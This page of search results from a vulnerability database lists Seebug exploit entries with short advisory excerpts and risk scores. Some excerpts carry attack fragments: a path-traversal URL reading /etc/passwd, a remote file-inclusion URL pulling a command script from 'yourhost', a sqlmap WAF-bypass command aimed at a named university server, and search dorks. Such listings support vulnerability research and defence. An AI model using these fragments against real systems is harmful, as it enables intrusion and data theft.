Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2016/06/24 12:0 a.m.368 views

phpoa upLoadOfficeFile.php 任意文件上传漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/04/15 12:0 a.m.368 views

多个产品BMP拒绝服务漏洞

ACDSee, IrfranView和FastStone image viewer是图片管理处理程序。 ACDSee, IrfranView和FastStone image viewer处理畸形BMP文件存在问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 FastStone Image Viewer 2.9 目前没有解决方案提供: http://www.irfanview.com/ http://www.acdsee.com...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/05/04 12:0 a.m.367 views

YaPIG 0.95b Remote Code Execution Exploit

No description provided by source. ?php / This module adds a comment file in $giddir . $gid . "" .$phid file Each File will have this format if $SEPARATOR=":"; title:author:date:email:web:message\n if a message contains "\n" character, it will be replaced with "br /" The variables receives by the...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/11 12:0 a.m.367 views

Mambo AkoComment Module mosConfig_absolute_path远程文件包含漏洞

Mambo AkoComment是一款基于PHP的WEB应用程序。 Mambo AkoComment不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'akocomments.php'脚本对用户提交的'mosConfigabsolutepath'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Arthur Konze WebDesign AkoComment 1.1 http://www.konze.de/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/04/15 12:0 a.m.366 views

Dr.COM DrcomManager 任意文件下载漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/09/02 12:0 a.m.365 views

Microsoft IIS FTPd服务NLST命令远程栈溢出漏洞

BUGTRAQ ID: 36189 CVECAN ID: CVE-2009-3023 Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 Microsoft IIS内嵌的FTP服务器中存在栈溢出漏洞。如果远程攻击者对带有特制名称的目录发布了包含有通配符的FTP NLST(NAME LIST)命令的话,就可以触发这个溢出,导致执行任意代码。仅在攻击者拥有写访问权限的情况下才可以创建带有特殊名称的目录。 Microsoft IIS 6.0 Microsoft IIS 5.0 厂商补丁: Microso...

9.3CVSS6.4AI score0.90913EPSS
Exploits11
seebug.org
seebug.org
added 2007/03/14 12:0 a.m.365 views

JGBBS 3.0beta1 (search.asp author) SQL Injection Exploit

No description provided by source. JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit SQL Injection Code input name="author" type="text" value="UniquE-Key'UNION SELECT...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/02/19 12:0 a.m.365 views

S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit

No description provided by source. S-G鋝tebuch //'=============================================================================================== //'Script Name: S-G鋝tebuch //'Dork Ex. : http://www.google.com.tr/search?q=VS-G%C3%A4stebuch+V.+%C2%A9&hl=tr&start=10&sa=N //'S.Page :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.364 views

Downline Goldmine paidversion (tr.php id) - SQL Injection Vulnerability

No description provided by source. paidversion tr.php id Remote SQL Injection Vulnerability Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc script : http://www.downlinegoldmine.com/ DorK : inurl:tr.php?id= Exploit :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.364 views

PHPizabi 0.848b - C1 HFP1 Remote Privilege Escalation Vulnerability

No description provided by source. -------------------------------------------------------------------------------- PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation php.ini independent by Nine:Situations:Group::bookoo...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/02/13 12:0 a.m.362 views

MediaWiki远程代码执行漏洞

CVE ID:CVE-2014-1610 MediaWiki是美国维基媒体(Wikimedia)基金会和MediaWiki志愿者共同开发维护的一套自由免费的基于网络的Wiki引擎,它可用于部署内部的知识管理和内容管理系统。 MediaWiki中存在输入验证漏洞,该漏洞源于thumb.php脚本没有正确过滤‘page’参数。当启用支持上传DjVu或PDF文件时,远程攻击者可借助特制的shell元字符利用该漏洞执行任意命令。以下版本受到影响:MediaWiki 1.22.2之前的1.22.x版本,1.21.5之前的1.21.x版本,1.19.11之前的1.19.x版本。 0 MediaWik...

6CVSS0.42777EPSS
Exploits12
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.360 views

Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability

No description provided by source. =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Mambo comserverstat Component =0.4.4 Remote File Include Vulnerability + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Author: xoron turkish...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.359 views

Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support

No description provided by source. / CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned within encrypted...

5CVSS8.2AI score0.99999EPSS
Exploits87
seebug.org
seebug.org
added 2013/09/01 12:0 a.m.359 views

大汉版通JCMS内容管理系统任意文件下载漏洞

简要描述: 多处任意文件下载,影响版本未知,大概都影响吧。 详细说明: 1. http://target/jcms/m59/sendreport/downfile.jsp?filename=/etc/passwd&savename=passwd.txt 要得到网站路径,访问:http://target/jcms/m59/sendreport/,然后生成报表就看得到了。 2...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2012/10/29 12:0 a.m.359 views

ueditor 1.2.2.0 fileUp.jsp 文件上传漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/12 12:0 a.m.359 views

PHPCodeGenie Core.PHP远程文件包含漏洞

PHPCodeGenie是一款基于PHP的内容管理程序。 PHPCodeGenie不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'core.php'脚本对用户提交的'BeautPath'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 phpCodeGenie phpCodeGenie 3.0.2 http://sourceforge.net/projects/phpcodegenie/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/12/15 12:0 a.m.357 views

Joomla 1.5 - 3.4 版本远程命令执行漏洞

使用编写好的脚本对其进行发包(注入恶意 User-Agent 存储进入数据库 Session Data ): 其中 User-Agent 为:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/01/08 12:0 a.m.357 views

OpenSSL 'EVP_VerifyFinal'函数签名验证漏洞

BUGTRAQ ID: 33150 CVE ID:CVE-2008-5077 CNCVE ID:CNCVE-20085077 OpenSSL是一款开放源码的SSL实现,用来实现网络通信的高强度加密。 部分OpenSSL函数验证DSA和ECDSA密钥时不正确验证"EVPVerifyFinal"函数返回值,发送特殊构建的签名证书链给客户端,可绕过签名检查。 通过恶意服务器或中间人攻击,可使证书链中的畸形SSL/TLS签名绕过客户端软件检查,导致盲目信任并泄漏敏感信息。 成功利用此漏洞需要服务器使用包含DSA或者ECDSA密钥的证书。 Ubuntu Ubuntu Linux 8.10 spar...

5.8CVSS7.3AI score0.05146EPSS
Exploits1
seebug.org
seebug.org
added 2008/01/21 12:0 a.m.357 views

Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BOF Exploit

No description provided by source. !-- Toshiba Surveillance Surveillix RecordSend Class MeIpCamX.DLL 1.0.0.4 remote buffer overflow exploit IE7/xpsp2 a demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio codebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.c...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2018/01/23 12:0 a.m.356 views

xiuno bbs xss漏洞

Xiuno BBS 4.0.0 后台xss 漏洞 1、什么是 Xiuno BBS 4.0? 它是一款国产、小巧、稳定、支持在大数据量下仍然保持高负载能力的轻论坛。它只有 20 多个表,源代码压缩后 1M 左右,运行速度非常快,处理单次请求在 0.01 秒级别,在有 APC、Yac、XCache 的环境下可以跑到 0.00x 秒,对第三方类库依赖少,作者认为它就像一辆纯手工打造的法拉利,动力强劲,没有一丝赘肉,方便部署和维护,是一个非常好的二次开发的基石。 2,漏洞详情 Xiuno BBS 4.0.0 后台 设置-基本设置- 站点名称 过滤不严 存在xss漏洞。 站点名称处输入xss...

0.9AI score
Exploits0
seebug.org
seebug.org
added 2017/05/26 12:0 a.m.356 views

initroot: Bypassing Nexus 6 Secure Boot through Kernel Command-line Injection

In the May 2017 Android Security Bulletin, Google released a patch to a critical and unique vulnerability CVE-2016-10277 in the Nexus 6 bootloader we had found and responsibly disclosed. By exploiting the vulnerability, a physical adversary or one with authorized-ADB/fastboot USB access to the...

9.3CVSS7.9AI score0.09465EPSS
Exploits6
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.356 views

TLS Renegotiation Vulnerability PoC

No description provided by source. !/usr/bin/env python RedTeam Pentesting GmbH [email protected] http://www.redteam-pentesting.de PoC exploit for the TLS renegotiation vulnerability CVE-2009-3555 License ------- CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/ Timeline -------...

5.8CVSS7.9AI score0.87264EPSS
Exploits14
seebug.org
seebug.org
added 2008/03/20 12:0 a.m.356 views

Sun Solaris &lt;= 10 rpc.ypupdated Remote Root Exploit

No description provided by source. ypk.c: /update: kcope/year2008/tested on SunOS 5.10// KEYSERV/YPUPDATED SunOS 4.1.3/RPC SERVICES ...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2017/04/14 12:0 a.m.355 views

Linux kernel 'udp. c' remote code execution vulnerability(CVE-2016-10229)

The Linux kernel allows remote attackers to execute arbitrary code via UDP traffic that triggers an unsafe second checksum calculation during execution of a recv system call with the MSGPEEK flag. This may create a kernel panic or memory corruption leading to privilege escalation...

10CVSS9.5AI score0.12791EPSS
Exploits1
seebug.org
seebug.org
added 2015/10/30 12:0 a.m.355 views

青果教务系统 /xsweb/pub/temp.aspx nj参数SQL注入漏洞

存在漏洞的文件:/xsweb/pub/temp.aspx?type=ajax&fellowXh=wooyun 该系统有waf的防御,只需要使用--tamper参数即可绕过,继续注入 sqlmap.py -u "http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun" --tamper "equaltolike.py" --dbms mssql...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/03/26 12:0 a.m.355 views

WeBid 0.7.3 RC9 (upldgallery.php) Remote File Upload Vulnerability

No description provided by source. ----------------------------------------------------------------------------------------- Author : Ahmad Pay Date : March, 25 2009 Location : Bojonegoro, Indonesia Critical : High Impact : System Access Where : From Remote...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/10/30 12:0 a.m.354 views

Joomla extended_registration组件远程文件包含漏洞

extendedregistration是Mambo(也被称为Joomla)中提供扩展注册支持的组件。 extendedregistration组件在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。 extendedregistration组件没有正确地验证mosConfigabsolutepath参数数据的输入,允许攻击者通过包含本地或外部资源任意文件导致执行任意PHP代码。admin.extendedregistration.php文件中漏洞代码如下: ?php require"../configuration.php"; functi...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/03/06 12:0 a.m.353 views

用友GRP-U8 财务管理软件userInfoWeb接口敏感信息泄露漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/01/12 12:0 a.m.353 views

TurboMail 前台sql注入漏洞

简要描述: 前台注入存在注入,可查看管理员密码甚至getshell。 详细说明: 0x1 前台注入 turbomail\web\webapps\ROOT\enterprise\noteadd.jsp: ... UserInfo userinfo = ms.userinfo; if userinfo == null XInfo.gotoInfoms,request,response,"info.loginfail",null,0; return; String id = request.getParameter"id";//id参数传入,没有过滤 Note note = null;...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/12/26 12:0 a.m.353 views

Oracle (oidldapd connect) Local Command Line Overflow Exploit

No description provided by source. / Exploit Code for oidldapd in Oracle 8.1.6 8ir2 for Linux. I tested in RH 6.2 and 6.1. This code is a bullshit i know please no comments about ;-. If someone exports this to Sparc please tell me. synopsis: buffer overflow in oidldapd...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/06/03 12:0 a.m.352 views

用友oa /yyoa/checkWaitdo.jsp 注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/10/15 12:0 a.m.352 views

Microsoft Windows Internet打印服务整数溢出漏洞(MS08-062)

BUGTRAQ ID: 31682 CVECAN ID: CVE-2008-1446 Microsoft Windows是微软发布的非常流行的操作系统。 IIS的Internet打印协议ISAPI扩展在处理特制的IPP响应时存在整数溢出漏洞。如果Windows系统上在运行IIS且启用了Internet打印服务的话,远程攻击者可以通过特制的HTTP POST请求诱骗受影响的服务器连接到恶意的IPP服务器来触发这个溢出,导致执行任意指令。 Microsoft Windows XP SP3 Microsoft Windows XP SP2 Microsoft Windows Vista SP1...

9CVSS6.9AI score0.46272EPSS
Exploits2
seebug.org
seebug.org
added 2015/09/07 12:0 a.m.351 views

DedeCMS 5.7 SP1 /install/index.php 远程文件包含漏洞

1.漏洞分析 /install/index.php.bak or index.php php $slang = 'utf-8'; $installdemoname = 'dedev57demo.txt'; $insLockfile = dirnameFILE.'/installlock.txt'; //初始化了变量 $moduleCacheFile = dirnameFILE.'/modules.tmp.inc';//初始化了变量 .... 29行 foreachArray'GET','POST','COOKIE' as $request foreach$$request as $k =...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/12/13 12:0 a.m.351 views

Novell eDirectory 8.8 Long URI iMonitor Buffer Overflow Exploit (meta)

No description provided by source. This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artisti...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2018/03/08 12:0 a.m.350 views

Selenium Server 未授权访问漏洞

1.开篇 不知道大家在平日工作中有没有遇到过一些端口,使用浏览器打开是下面这样子的: 上图中我找了几个在不同端口下的例子。 2.Selenium-开源的自动化测试利器 本篇主要的主角-Selenium究竟是什么呢?有过QA经验或安全自动化测试经验的朋友应该知道,以下文字来自百度百科:Selenium1 是一个用于Web应用程序测试的工具。Selenium测试直接运行在浏览器中,就像真正的用户在操作一样。支持的浏览器包括IE(7, 8, 9, 10, 11),Mozilla Firefox,Safari,Google Chrome,Opera等。支持自动录制动作和自动生成...

7AI score
Exploits0
seebug.org
seebug.org
added 2017/09/06 12:0 a.m.350 views

beescms4.0 一处任意文件上传漏洞#3

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2017/11/30 12:0 a.m.349 views

"Huge Dirty COW" (CVE-2017–1000405)

The “Dirty COW” vulnerability CVE-2016–5195 is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. The impact was vast — millions of users could be compromised easily and reliably, bypassing...

7.2CVSS7.9AI score0.83524EPSS
Exploits89
seebug.org
seebug.org
added 2018/04/28 12:0 a.m.348 views

Multiple Vulnerabilities in TP-Link TL-SG108E(CVE-2017-17745, CVE-2017-17746, CVE-2017-17747)

Overview Three vulnerabilities have been discovered in the TP-Link TL-SG108E, firmware 1.0.0 Build 20160722 Rel.50167: CVE-2017-17745 - Cross Site Scripting XSS in systemnameset.cgi, sysName parameter CVE-2017-17746 - Weak access control for user authentication CVE-2017-17747 - Weak access contro...

7.7CVSS0.1AI score0.02039EPSS
Exploits5
seebug.org
seebug.org
added 2017/10/09 12:0 a.m.348 views

Dnsmasq Heap based overflow(CVE-2017-14492)

1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i --name dnsmasqtest dnsmasq bash docker cp poc.py dnsmasqtest:/poc.py docker exec -it bash 2 On one terminal start dnsmasq: /test/dnsmasqnoasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff --enable-ra...

7.5CVSS0.1AI score0.93307EPSS
Exploits5
seebug.org
seebug.org
added 2009/10/27 12:0 a.m.348 views

ProFTPD mod_tls模块CA SSL证书验证漏洞

BUGTRAQ ID: 36804 CVE ID: CVE-2009-3639 ProFTPD是一款开放源代码FTP服务程序。 ProFTPD的modtls模块没有正确地处理X.509证书主题通用名称(CN)字段域名中的空字符(\0),在处理包含有空字符的证书字段时错误地将空字符处理为截止字符,因此只会验证空字符前的部分。例如,对于类似于以下的名称: example.com\0.haxx.se 证书是发布给haxx.se的,但modtls模块错误的验证给example.com,这有助于攻击者通过中间人攻击执行网络钓鱼等欺骗。 必须满足以下modtls配置的情况下服务器才受这个漏洞影响:...

5.8CVSS2.1AI score0.057EPSS
Exploits1
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.347 views

Softbiz Auktios Script Multiple SQL Injection Vulnerabilities

No description provided by source. ----------------------------Information------------------------------------------------ +Name : softbiz auktios script sql injection viewitems.php +Autor : Easy Laster +Date : 24.02.2010 +Script : softbiz auktios script +Download : ----- +Demo : http://ezpips.co...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2011/11/25 12:0 a.m.347 views

Apache HTTP Server mod_proxy反向代理模式安全限制绕过漏洞

BUGTRAQ ID: 50802 CVE ID: CVE-2011-4317 Apache HTTP Server是Apache软件基金会的一个开放源代码的网页服务器,可以在大多数电脑操作系统中运行,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 Apache HTTP Server在反向代理模式中配置modproxy模块时错误地处理了某些Web请求,可通过特制的URL向代理后方的服务器发送请求,从而绕过某些安全限制。 Apache 2.2.x Apache 2.0.x 厂商补丁: Apache Group ------------...

4.3CVSS8.7AI score0.60783EPSS
Exploits3
seebug.org
seebug.org
added 2009/02/02 12:0 a.m.347 views

Coppermine Photo Gallery变量内容重写漏洞

Coppermine是用PHP编写的多用途集成Web图形库脚本。 Coppermine Photo Gallery处理用户请求数据时存在漏洞,远程攻击者可能利用此漏洞上传PHP脚本文件从而控制应用系统。 系统的include/init.inc.php脚本在过滤处理全局变量时存在问题,远程攻击者可以据此绕过安全限制上传任意脚本文件实现命令执行。要利用此漏洞需要系统的PHP打开registerglobals选项。 Coppermine Photo Gallery 1.x Coppermine Photo Gallery 临时解决方法:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2017/04/10 12:0 a.m.346 views

Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability (CVE-2017-3881)

详情来源:https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ Do you still have telnet enabled on your Catalyst switches? Think twice, here’s a proof-of-concept remote code execution exploit for Catalyst 2960 switch with latest suggested firmware. Check out the exploit code here. What...

10CVSS9.9AI score0.98975EPSS
Exploits12
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.344 views

Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln

No description provided by source. Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: Powered By Aardvark Topsites PHP 4.2.2 Exploit: /sources/join.php?FORMurl=owned&CONFIGcaptcha=1&CONFIGpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.343 views

Microsoft Outlook Web Access for Exchange Server 2003 'redir.asp' URI Redirection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/31765/info Outlook Web Access is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks. OWA 6.5 SP 2 is...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/10/10 12:0 a.m.341 views

mozilla-thunderbird多个安全漏洞

No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2009:217-1 http://www.mandriva.com/security/ Package : mozilla-thunderbird Date : August 23, 2009 Affected: 2009.1 Problem Description: A number of security vulnerabilities have...

6.8CVSS6.9AI score0.3038EPSS
Exploits5
seebug.org
seebug.org
added 2008/11/16 12:0 a.m.341 views

ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability

No description provided by source. ================================================================================================================== SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M ...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2018/06/20 12:0 a.m.340 views

AVTECH {DVR/NVR/IPC} IPCP API RCE

!/usr/bin/env python2.7 SOF Subject: AVTECH DVR/NVR/IPC IPCP API admin l/p, RCE 2018 bashis Attack vector: Remote Authentication: Anonymous no credentials needed Researcher: bashis March 2018 Authenticated Reverse Shell; Using admin l/p that we can retrieve with unauthenticated and undocumented...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2017/03/01 12:0 a.m.338 views

Cisco ASA Remote Code Execution (CVE-2016-1287)

Remote Code Execution on Cisco ASA A year ago ExodusIntel disclosed a vulnerability affecting the IKE implementation in Cisco’s ASA products. The error is due to an overflow in the checking of reassembled IKE fragments, and allows remote code execution from an unauthenticated attacker. More...

10CVSS10AI score0.77462EPSS
Exploits4
Total number of security vulnerabilities5000